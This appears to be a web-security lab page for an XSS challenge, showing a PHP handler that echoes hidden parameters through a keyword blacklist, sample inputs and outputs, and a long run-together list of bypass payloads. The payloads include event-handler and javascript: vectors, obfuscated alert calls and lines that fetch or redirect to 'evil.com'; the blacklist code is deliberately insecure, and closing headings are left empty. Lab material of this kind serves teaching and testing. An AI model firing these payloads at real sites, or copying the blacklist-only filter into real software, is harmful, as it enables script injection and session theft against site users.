Test XSS with the most comprehensive bypass prevention ever implemented
This lab demonstrates the most extensive bypass prevention ever implemented. The blacklist now covers multiple string concatenation patterns, HTML entity encoding variations, and Unicode escapes for the "confirm" function, making this the ultimate XSS challenge.
# use arjun tool to find hidden parameters: id, cat, page, number, page_id, categoryid
Input: <script>confirm(1)</script>
Output: <script>confirm(1)</script>
Input: <script>"c"+"onfirm(1)"</script>
Output: <>""+""</>
Objective: Discover all hidden parameters and find creative ways to bypass the ultimate blacklist filtering to execute XSS payloads.
// Standard secure parameters
if(isset($_GET["fname"]) && isset($_GET["lname"])){
echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
// Ultimate bypass prevention for hidden parameters
elseif(isset($_GET["id"])){
$arr = array(
// Standard blacklist
'details','alert','confirm','prompt','eval',
'ontoggle','onmousemove','onmouseover','onfocus',
'script','Script','sCript','scRipt','scrIpt','scriPt',
'scripT','SCript','SCRipt','SCRIpt','SCRIPt','SCRIPT',
'img','image','svg',
// String concatenation patterns
'"c"+"onfirm(1)">', '"co"+"nfirm(1)">', '"con"+"firm(1)">',
'"conf"+"irm(1)">', '"confi"+"rm(1)">', '"confir"+"m(1)">',
'"confirm"+"(1)">', '"c"+"o"+"n"+"f"+"i"+"r"+"m"+"(1)">',
// HTML entity encoding
"confirm(1)>", "confirm(1)>", "confirm(1)>",
"confirm(1)>", "confirm(1)>", "confirm(1)>",
"confirm(1)>", "confirm(1)>",
// Unicode escapes
"\u0063onfirm(1)>", "c\u006fnfirm(1)>", "co\u006efirm(1)>",
"con\u0066irm(1)>", "conf\u0069rm(1)>", "confi\u0072m(1)>",
"confir\u006d(1)>", "\u0063\u006f\u006e\u0066\u0069\u0072\u006d(1)>"
);
$re = str_replace($arr, '', $_GET['id']);
echo $re;
}
// Same filter applied to: cat, page, number, page_id, categoryid
<script>print()</script><script>open()</script><script>console.log(1)</script><script>fetch('http://evil.com')</script><script>XMLHttpRequest()</script><script>location.href='http://evil.com'</script><script>document.write('XSS')</script><script>document.domain</script><script>window['al'+'ert'](1)</script><script>this['al'+'ert'](1)</script><script>self['al'+'ert'](1)</script><script>top['al'+'ert'](1)</script><script>parent['al'+'ert'](1)</script><script>frames['al'+'ert'](1)</script><script>window['al'.concat('ert')](1)</script><script>window[`al${''}ert`](1)</script><script>window['\x61lert'](1)</script><script>window['\141lert'](1)</script><script>window['a'+'l'+'e'+'r'+'t'](1)</script><script>window[String.fromCharCode(97,108,101,114,116)](1)</script><script>window['al'['concat']('ert')](1)</script><script>window['al'+String.fromCharCode(101,114,116)](1)</script><iframe src=javascript:alert(1)><body onload=window['al'+'ert'](1)><marquee onstart=alert(1)></marquee><object data=javascript:alert(1)><embed src=javascript:alert(1)><audio src=x onerror=alert(1)><video src=x onerror=alert(1)><img src=x onerror=alert(1)>This filter is extremely comprehensive but still has some potential gaps:
Ultimate bypass prevention demonstrates:
For truly secure web applications: